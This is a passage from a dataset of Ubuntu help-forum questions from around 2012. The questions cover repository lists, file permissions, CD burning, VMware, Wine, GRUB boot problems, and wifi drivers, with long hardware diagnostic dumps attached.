//tw.archive.ubuntu.com/ubuntu/ natty-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //tw.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse # deb-src http : //tw.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu natty-security main restricted deb-src http : //security.ubuntu.com/ubuntu natty-security main restricted deb http : //security.ubuntu.com/ubuntu natty-security universe deb-src http : //security.ubuntu.com/ubuntu natty-security universe deb http : //security.ubuntu.com/ubuntu natty-security multiverse deb-src http : //security.ubuntu.com/ubuntu natty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu natty partner # deb-src http : //archive.canonical.com/ubuntu natty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu natty main deb-src http : //extras.ubuntu.com/ubuntu natty main sam @ sam : /etc/apt $ how to solve it ? thank you~
174823	can i restrict file access to other users ?	i 'm sharing my computer with my roommate , and she needs access to my libre office , but i do n't want her to see my financial/tax information . i 've giver her a separate user account . is there a way to make my folder not show up or be password protected for her username ? i 'm using ubuntu 12.04 with a gnome classic desktop . i 'm not worried about her going through terminal , i just want to hide those files or that folder in her session .
174825	ca n't burn iso to cd	i 'm using ubuntu 12.04 lts which was installed with wubi . my windows became corrupt , so i need a installation cd to repair it . i downloaded the iso image and took 'open with brasero ' ( i also tried 'write to disk ' ) . the burning process get completed ( that 's what i think ) and the window shows 100 % completed . but a process is still going on saying 'creating image checksum ' . it shows no progress although the window is not frozen . either please instruct a way to fix this or recommend a good software that burns iso image to cd without fail . or you could tell me if there is a software for burning it into a usb flash drive without needing to format it .
174831	how to install vmware workstation in ubuntu 12.04 lts ?	i am totally new to a unix/linux based os . ubuntu 12.04 is my first linux experience and i can not install vmware workstation . i wish to know how to do install it in a step by step way . i am running ubuntu 12.04 in a toshiba satellite a205-s5831 ; i have 2 gb of ram and the detailed specification of my laptop is here .
174832	xubuntu 12.04 keyboard freezes but only in x	i 'm new to xubuntu ( only because my laptop wo n't run any modern linux flavour ) . [ pentium m ] randomly i would get a keyboard hang up - no warning . ( when i say this , a couple of times the menu also did not work ) the mouse still works and if i switch to another tty , the keyboard works fine . from here i can run an init 6 to reboot the system and all is well again . i have noticed that it is more prone to happen when i use the keyboad shotcuts on my laptop , for instance fn+vol up or fn+vol down . i have not installed proprietary ati drivers nor changed keymappings . updated or unupdated , it does the dame thing . ( i have now installed 12 times ) attached is my hardinfo : devices processor -processor- name : intel ( r ) pentium ( r ) m processor 1.60ghz family , model , stepping : 6 , 13 , 6 ( pentium iii/pentium iii xeon/celeron ) vendor : intel -configuration- cache size : 2048kb frequency : 1600.00mhz bogomips : 3191.88 byte order : little endian -features- fdiv bug : no hlt bug : no f00f bug : no coma bug : no has fpu : yes -cache- cache information not available -capabilities- fpu : floating point unit vme : virtual 86 mode extension de : debug extensions - i/o breakpoints pse : page size extensions ( 4mb pages ) tsc : time stamp counter and rdtsc instruction msr : model specific registers mce : machine check architeture cx8 : cmpxchg8 instruction mtrr : memory type range registers pge : page global enable mca : machine check architecture cmov : conditional move instruction clflush : cache line flush instruction dts : debug store acpi : thermal monitor and software controlled clock mmx : mmx technology fxsr : fxsave and fxrstor instructions sse : sse instructions sse2 : sse2 ( wni ) instructions ss : self snoop tm : thermal monitor pbe : pending break enable up : smp kernel running on up bts : branch trace store est : enhanced speedstep tm2 : thermal monitor 2 memory -memory- total memory : 2061876 kb free memory : 744036 kb buffers : 91920 kb cached : 772060 kb cached swap : 0 kb active : 678124 kb inactive : 562704 kb active ( anon ) : 377544 kb inactive ( anon ) : 5176 kb active ( file ) : 300580 kb inactive ( file ) : 557528 kb unevictable : 0 kb mlocked : 0 kb high memory : 1187784 kb free high memory : 77984 kb low memory : 874092 kb free low memory : 666052 kb virtual memory : 2096124 kb free virtual memory : 2096124 kb dirty : 168 kb writeback : 0 kb anonpages : 376860 kb mapped : 91404 kb shmem : 5840 kb slab : 48688 kb sreclaimable : 36984 kb sunreclaim : 11704 kb kernelstack : 2536 kb pagetables : 6524 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 3127060 kb committed_as : 1731096 kb vmalloctotal : 122880 kb vmallocused : 10704 kb vmallocchunk : 109088 kb hardwarecorrupted : 0 kb anonhugepages : 0 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 4096 kb directmap4k : 32760 kb directmap4m : 876544 kb pci devices -pci devices- host bridge : intel corporation 82852/82855 gm/gme/pm/gmv processor to i/o controller ( rev 02 ) system peripheral : intel corporation 82852/82855 gm/gme/pm/gmv processor to i/o controller ( rev 02 ) system peripheral : intel corporation 82852/82855 gm/gme/pm/gmv processor to i/o controller ( rev 02 ) pci bridge : intel corporation 82852/82855 gm/gme/pm/gmv processor to agp controller ( rev 02 ) ( prog-if 00 [ normal decode ] ) usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 1 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 2 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller : intel corporation 82801db/dbm ( ich4/ich4-m ) usb2 ehci controller ( rev 03 ) ( prog-if 20 [ ehci ] ) pci bridge : intel corporation 82801 mobile pci bridge ( rev 83 ) ( prog-if 00 [ normal decode ] ) isa bridge : intel corporation 82801dbm ( ich4-m ) lpc interface bridge ( rev 03 ) ide interface : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) smbus : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) smbus controller ( rev 03 ) multimedia audio controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 03 ) modem : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 modem controller ( rev 03 ) ( prog-if 00 [ generic ] ) vga compatible controller : advanced micro devices [ amd ] nee ati rv350 [ mobility radeon 9600 m10 ] ( prog-if 00 [ vga controller ] ) network controller : intel corporation pro/wireless 2200bg [ calexico2 ] network connection ( rev 05 ) ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) cardbus bridge : ene technology inc cb-710/2/4 cardbus controller ( rev 01 ) flash memory : ene technology inc cb710 memory card reader controller firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev 80 ) ( prog-if 10 [ ohci ] ) usb devices printers -printers- no printers found battery -battery : bat0- state : charged ( load : 0 ma ) capacity : 0 mah / 0 mah ( -nan % ) battery technology : rechargeable ( lion ) model number : internal battery serial number sensors input devices -input devices- sleep button lid switch power button at translated set 2 keyboard synps/2 synaptics touchpad storage -scsi disks- ata hitachi hts54168 tsstcorp cd/dvdw sn-s082d huawei mass storage huawei tf card storage usb flash drive dmi -bios- date : 12/01/2004 vendor : insyde software corporation version : r1.10 -board- name : montara-gml vendor : mtc resources -i/o ports- < tt > 0000-001f < /tt > : dma1 < tt > 0020-0021 < /tt > : pic1 < tt > 0040-0043 < /tt > : timer0 < tt > 0050-0053 < /tt > : timer1 < tt > 0060-0060 < /tt > : keyboard < tt > 0062-0062 < /tt > : ec data < tt > 0064-0064 < /tt > : keyboard < tt > 0066-0066 < /tt > : ec cmd < tt > 0070-0077 < /tt > : rtc0 < tt > 0080-008f < /tt > : dma page reg < tt > 00a0-00a1 < /tt > : pic2 < tt > 00c0-00df < /tt > : dma2 < tt > 00f0-00ff < /tt > : fpu < tt > 0170-0177 < /tt > : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) < tt > 0170-0177 < /tt > : ata_piix < tt > 01f0-01f7 < /tt > : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) < tt > 01f0-01f7 < /tt > : ata_piix < tt > 0200-020f < /tt > : pnp 00:07 < tt > 0290-0297 < /tt > : pnp 00:07 < tt > 0376-0376 < /tt > : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) < tt > 0376-0376 < /tt > : ata_piix < tt > 03f6-03f6 < /tt > : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) < tt > 03f6-03f6 < /tt > : ata_piix < tt > 0680-06ff < /tt > : pnp 00:07 < tt > 077c-077f < /tt > : pnp 00:07 < tt > 0cf8-0cff < /tt > : pci conf1 < tt > 1000-107f < /tt > : intel corporation 82801dbm ( ich4-m ) lpc interface bridge ( rev 03 ) < tt > 1000-107f < /tt > : pnp 00:07 < tt > 1000-1003 < /tt > : acpi pm1a_evt_blk < tt > 1004-1005 < /tt > : acpi pm1a_cnt_blk < tt > 1008-100b < /tt > : acpi pm_tmr < tt > 1010-1015 < /tt > : acpi cpu throttle < tt > 1020-1020 < /tt > : acpi pm2_cnt_blk < tt > 1028-102f < /tt > : acpi gpe0_blk < tt > 1100-110f < /tt > : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) < tt > 1100-110f < /tt > : ata_piix < tt > 1200-121f < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 1 ( rev 03 ) ( prog-if 00 [ uhci ] ) < tt > 1200-121f < /tt > : uhci_hcd < tt > 1300-133f < /tt > : intel corporation 82801dbm ( ich4-m ) lpc interface bridge ( rev 03 ) < tt > 1300-133f < /tt > : pnp 00:07 < tt > 1400-141f < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) smbus controller ( rev 03 ) < tt > 1600-161f < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 2 ( rev 03 ) ( prog-if 00 [ uhci ] ) < tt > 1600-161f < /tt > : uhci_hcd < tt > a000-bfff < /tt > : pci bus 0000:02 < tt > a000-a07f < /tt > : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev 80 ) ( prog-if 10 [ ohci ] ) < tt > a080-a0ff < /tt > : ene technology inc cb710 memory card reader controller < tt > a080-a0ff < /tt > : ene cb710 memory card reader driver < tt > a200-a2ff < /tt > : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) < tt > a200-a2ff < /tt > : realtek rtl-8139 fast ethernet driver < tt > a400-a4ff < /tt > : pci cardbus 0000:03 < tt > a800-a8ff < /tt > : pci cardbus 0000:03 < tt > c000-dfff < /tt > : pci bus 0000:01 < tt > c100-c1ff < /tt > : advanced micro devices [ amd ] nee ati rv350 [ mobility radeon 9600 m10 ] ( prog-if 00 [ vga controller ] ) < tt > e000-e0ff < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 03 ) < tt > e000-e0ff < /tt > : intel 82801db-ich4 < tt > e100-e13f < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 03 ) < tt > e100-e13f < /tt > : intel 82801db-ich4 < tt > e200-e2ff < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 modem controller ( rev 03 ) ( prog-if 00 [ generic ] ) < tt > e300-e37f < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 modem controller ( rev 03 ) ( prog-if 00 [ generic ] ) -memory- < tt > 00000000-0000ffff < /tt > : reserved < tt > 00010000-0009fbff < /tt > : system ram < tt > 0009fc00-0009ffff < /tt > : reserved < tt > 000a0000-000bffff < /tt > : video ram area < tt > 000c0000-000cffff < /tt > : video rom < tt > 000e0000-000fffff < /tt > : reserved < tt > 000e0000-000e17ff < /tt > : adapter rom < tt > 000f0000-000fffff < /tt > : system rom < tt > 00100000-7ffeffff < /tt > : system ram < tt > 01000000-0157be03 < /tt > : kernel code < tt > 0157be04-0182f57f < /tt > : kernel data < tt > 018e8000-019bffff < /tt > : kernel bss < tt > 7fff0000-7fffffbf < /tt > : acpi tables < tt > 7fffffc0-7fffffff < /tt > : acpi non-volatile storage < tt > 80000000-800003ff < /tt > : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) < tt > 90000000-9fffffff < /tt > : pci bus 0000:02 < tt > 90000000-93ffffff < /tt > : pci cardbus 0000:03 < tt > a0000000-afffffff < /tt > : pci bus 0000:01 < tt > a0000000-a001ffff < /tt > : advanced micro devices [ amd ] nee ati rv350 [ mobility radeon 9600 m10 ] ( prog-if 00 [ vga controller ] ) < tt > a8000000-afffffff < /tt > : advanced micro devices [ amd ] nee ati rv350 [ mobility radeon 9600 m10 ] ( prog-if 00 [ vga controller ] ) < tt > b0000000-bfffffff < /tt > : intel corporation 82852/82855 gm/gme/pm/gmv processor to i/o controller ( rev 02 ) < tt > d0000000-dfffffff < /tt > : pci bus 0000:02 < tt > d0000000-d00007ff < /tt > : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev 80 ) ( prog-if 10 [ ohci ] ) < tt > d0000000-d00007ff < /tt > : driver for pci ohci ieee1394 controllers < tt > d0000800-d00008ff < /tt > : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) < tt > d0000800-d00008ff < /tt > : realtek rtl-8139 fast ethernet driver < tt > d0001000-d0001fff < /tt > : intel corporation pro/wireless 2200bg [ calexico2 ] network connection ( rev 05 ) < tt > d0001000-d0001fff < /tt > : intel ( r ) pro/wireless 2200/2915 network driver < tt > d4000000-d4000fff < /tt > : ene technology inc cb-710/2/4 cardbus controller ( rev 01 ) < tt > d4000000-d4000fff < /tt > : yenta_socket < tt > d8000000-dbffffff < /tt > : pci cardbus 0000:03 < tt > e0000000-efffffff < /tt > : pci bus 0000:01 < tt > e0010000-e001ffff < /tt > : advanced micro devices [ amd ] nee ati rv350 [ mobility radeon 9600 m10 ] ( prog-if 00 [ vga controller ] ) < tt > f0000400-f00005ff < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 03 ) < tt > f0000400-f00005ff < /tt > : intel 82801db-ich4 < tt > f0000600-f00006ff < /tt > : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 03 ) < tt > f0000600-f00006ff < /tt > : intel 82801db-ich4 < tt > febff000-febff3ff < /tt > : intel corporation 82801db/dbm ( ich4/ich4-m ) usb2 ehci controller ( rev 03 ) ( prog-if 20 [ ehci ] ) < tt > febff000-febff3ff < /tt > : ehci_hcd < tt > ffb80000-ffbfffff < /tt > : reserved < tt > fff80000-ffffffff < /tt > : reserved < tt > fff80000-ffffffff < /tt > : pnp 00:05 -dma- < tt > 4 < /tt > : cascade
174836	wine on edubuntu 11.10 ca n't find exe files entered in winecfg	am running edubuntu 11.10 on an hp low-profile desktop with amd 64 cpu and 512mb ram . i installed and updated wine 1.3 and set winecfg to auto detect drives per the instructions at winehq . it labelled the cdrom as d : and then i put the various .exe files ( like setup.exe , start.exe , etc ) in the winecfg window . even with the original disc in the cdrom drive and typing things from terminal like : wine setup.exe , there was error msg : could not find c : \windows\sytem32\setup.exe and the program did n't start . in winecfg , i chose to remain with `` default '' settings . help much appreciated but much detail needed as i am newbie to linux , the terminal and wine .
174837	when ubuntu boots it boots to a black screen with white text	i have a dell xps 400 , with a pentium d 2.8 ghz processor , 3gb of ram , and a ati 5770 gpu . it has windows 7 on it and i installed ubuntu yesterday . it booted fine the first time , but today i left windows 7 to boot into ubuntu and all i get is a black screen with text reading : gnu grub version 1.99-21ubuntu3 minimal bash-like line editing is supported.for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions the only thing i did when i was in ubuntu after i installed it was install an ati graphics driver .
174838	can i change synapse shortcut to super/windows key alone ?	when i try to edit the synapse config it does not allow me to use the left super as a shortcut to invoke it . is there a round-about way that i can go through . when i just press the windows/super key the configuration window does not acknowledge it . however , a combination shortcut ( such as super+a ) does work fine . since i 'm using precise , with unity , i 'd also need a way to change the default dash behaviour for windows/super key to something else .
174839	ubuntu preinstalled laptop : how to change the default search engine and home page in firefox ?	i have a new dell ubuntu pre-installed laptop . it came with 11.10 and i 've just upgraded it to 12.04 ( precise ) . firefox has its homepage set to yahoo search and the default search engine is yahoo too . i want to change the home page and the default search engine . every time i change this , the settings do not stick until the next time i start the browser again . there do n't seem to be any such settings that i can change in edit- > preferences . ( it does not stick until the next startup of the browser if i change the homepage in the preferences/general tab ) .
174847	where can i find the ubuntu kernel changelogs ?	i was wondering if there was a specific source that posted ubuntu 's changelogs for their kernel releases . i would like the changelogs because i want to check the changes before updating the kernels .
174863	what purpose does the public folder serve	in default home directory , there is a folder called public . what purpose does that serve ? are documents in that folder accessible to all users on the same computer ? what are the default permissions on that folder ?
174867	installing swampy module onto python	i need to install a package for my python interpretor . it is called swampy and you can get info from the web page - http : //www.greenteapress.com/thinkpython/swampy/install.html i am a novice so if you can provide step by step instructions please .
174868	wired connection not working in ubuntu 12.04 on lenovo g580 laptop	i found solution in http : //www.zyxware.com/articles/2680/solved-wired-connection-eth0-not-detected-in-ubuntu-12-04 i downloaded compact-wireless-2012-07-03-p.tar.bz2 here the steps i followed along with output 1. shravankumar @ shravankumar-lenovo-g580 : ~/desktop/compat-wireless-2012-07-03-p $ scripts/driver-select alx output : processing new driver-select request ... backup exists : makefile.bk backup exists : makefile.bk backup exists : drivers/net/ethernet/broadcom/makefile.bk backup exists : drivers/net/ethernet/atheros/makefile.bk backup exists : makefile.bk backup exists : makefile.bk backup exists : drivers/net/ethernet/broadcom/makefile.bk 2.shravankumar @ shravankumar-lenovo-g580 : ~/desktop/compat-wireless-2012-07-03-p $ make output : make -c /lib/modules/3.2.0-23-generic/build m=/home/shravankumar/desktop/compat-wireless-2012-07-03-p modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-23-generic' scripts/makefile.build:44 : /home/shravankumar/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx/makefile : no such file or directory make [ 4 ] : *** no rule to make target `/home/shravankumar/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx/makefile ' . stop . make [ 3 ] : *** [ /home/shravankumar/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros/alx ] error 2 make [ 2 ] : *** [ /home/shravankumar/desktop/compat-wireless-2012-07-03-p/drivers/net/ethernet/atheros ] error 2 make [ 1 ] : *** [ _module_/home/shravankumar/desktop/compat-wireless-2012-07-03-p ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-23-generic' make : *** [ modules ] error 2 3. hravankumar @ shravankumar-lenovo-g580 : ~/desktop/compat-wireless-2012-07-03-p $ make install output : fatal : could not open /lib/modules/3.2.0-23-generic/modules.dep.temp for writing : permission denied make : *** [ uninstall ] error 1 4. shravankumar @ shravankumar-lenovo-g580 : ~/desktop/compat-wireless-2012-07-03-p $ modeprobe alx output : no command 'modeprobe ' found , did you mean : command 'modprobe ' from package 'module-init-tools ' ( main ) modeprobe : command not found i am new to ubuntu , please help me . thanks in advance
174872	how do i install truecrypt ?	i have a windows 7 machine with truecrypt . i installed ubuntu 12.04 with the intention of converting to an ubuntu only machine but i ca n't install truecrypt on ubuntu . i have been looking through the forums and have followed all advice to the letter and still truecrypt does n't work ; i have only a non-functional icon in `` dash '' . should i uninstall ubuntu and start over ( ie reinstall ) ? i love ubuntu and greatly appreciate your efforts on this forum .
174879	re-enable showing of a dialog before moving files to the trash in kubuntu	i clicked on the `` do n't not ask again '' check-box of the dialog that was asking whether i 'm sure i want to move files to the trash , but now i 've changed my mind and i 'd rather have that back . but i do n't know where this setting is stored . how can i return to the default behavior ?
174884	wireless driver for dell inspiron 5520	i have a new dell inspiron 15r 5520 laptop running ubuntu 12.04 . my wireless driver does n't get detected in the additional drivers . please help . hardware : 14e4:4365
174885	dell vostro 3560 no wifi - broadcom bcm43142 hybrid chip	i got my new dell vostro 3560 with ubuntu 11.10 preinstalled , but after installing ubuntu 12.04 i got problems with wifi and dual video card drivers . the main problem is wifi , it 's impossible to work without it . i tried to find drivers using restricted drivers in the settings - there are only ati drivers there , and they work with problems - no unity 3d support at all . related discussion with no solution : https : //bbs.archlinux.org/viewtopic.php ? pid=1144542 http : //www.broadcom.com/products/wireless-lan/802.11-wireless-lan-solutions/bcm43142 here are the details of dell vostro 3560 laptop : alex @ zeus : ~ $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation ivy bridge dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation ivy bridge pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation ivy bridge graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation panther point usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation panther point mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation panther point high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation panther point pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation panther point pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation panther point pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation panther point usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation panther point lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation panther point 6 port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation panther point smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati thames xt/gl [ radeon hd 7600m series ] [ 1002:6840 ] 07:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) 08:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:4365 ] ( rev 01 ) alex @ zeus : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 001 device 005 : id 0c45:643f microdia bus 002 device 003 : id 0a5c:21d7 broadcom corp . bus 003 device 002 : id 093a:2510 pixart imaging , inc. optical mouse alex @ zeus : ~ $ sudo lshw -short pci ( sysfs ) h/w path device class description ======================================================= system vostro 3560 ( xxx123x # aba ) /0 bus 0c05gv /0/0 memory 128kib bios /0/4 processor intel ( r ) core ( tm ) i7-3612qm cpu @ 2.10ghz /0/4/9 memory 32kib l1 cache /0/4/a memory 256kib l2 cache /0/4/b memory 6mib l3 cache /0/4/1.1 processor logical cpu /0/4/1.2 processor logical cpu /0/4/1.3 processor logical cpu /0/4/1.4 processor logical cpu /0/4/1.5 processor logical cpu /0/4/1.6 processor logical cpu /0/4/1.7 processor logical cpu /0/4/1.8 processor logical cpu /0/4/1.9 processor logical cpu /0/4/1.a processor logical cpu /0/4/1.b processor logical cpu /0/4/1.c processor logical cpu /0/4/1.d processor logical cpu /0/4/1.e processor logical cpu /0/4/1.f processor logical cpu /0/4/1.10 processor logical cpu /0/8 memory 32kib l1 cache /0/29 memory 8gib system memory /0/29/0 memory 4gib sodimm ddr3 synchronous 1600 mhz ( 0.6 ns ) /0/29/1 memory 4gib sodimm ddr3 synchronous 1600 mhz ( 0.6 ns ) /0/100 bridge ivy bridge dram controller /0/100/1 bridge ivy bridge pci express root port /0/100/1/0 display thames xt/gl [ radeon hd 7600m series ] /0/100/2 display ivy bridge graphics controller /0/100/14 bus panther point usb xhci host controller /0/100/16 communication panther point mei controller # 1 /0/100/1a bus panther point usb enhanced host controller # 2 /0/100/1b multimedia panther point high definition audio controller /0/100/1c bridge panther point pci express root port 1 /0/100/1c/0 eth0 network rtl8111/8168b pci express gigabit ethernet controller /0/100/1c.1 bridge panther point pci express root port 2 /0/100/1c.1/0 network broadcom corporation /0/100/1c.2 bridge panther point pci express root port 3 /0/100/1d bus panther point usb enhanced host controller # 1 /0/100/1f bridge panther point lpc controller /0/100/1f.2 scsi0 storage panther point 6 port sata controller [ ahci mode ] /0/100/1f.2/0 /dev/sda disk 750gb st9750420as /0/100/1f.2/0/1 /dev/sda1 volume 100mib windows ntfs volume /0/100/1f.2/0/2 /dev/sda2 volume 585gib windows ntfs volume /0/100/1f.2/0/3 /dev/sda3 volume 1952mib linux swap volume /0/100/1f.2/0/4 /dev/sda4 volume 110gib ext4 volume /0/100/1f.2/1 /dev/cdrom disk dvd+-rw uj8c1 /0/100/1f.3 bus panther point smbus controller /0/1 scsi6 storage /0/1/0.0.0 /dev/sdb disk xd/sd/m.s . /0/1/0.0.0/0 /dev/sdb disk /1 power dell 911md23c alex @ zeus : ~ $ sudo lshw -class network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 07 serial : d4 : be : d9:2f:1a : c8 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.3 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:3000 ( size=256 ) memory : c3404000-c3404fff memory : c3400000-c3403fff *-network unclaimed description : network controller product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c3500000-c3507fff alex @ zeus : ~ $ sudo rfkill list all 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no alex @ zeus : ~ $ lspci -vvv 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) subsystem : dell device 056e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=01 , subordinate=06 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : c2000000-c2ffffff prefetchable memory behind bridge : 00000000a0000000-00000000afffffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 056e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 46 region 0 : memory at c3000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : dell device 056e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ 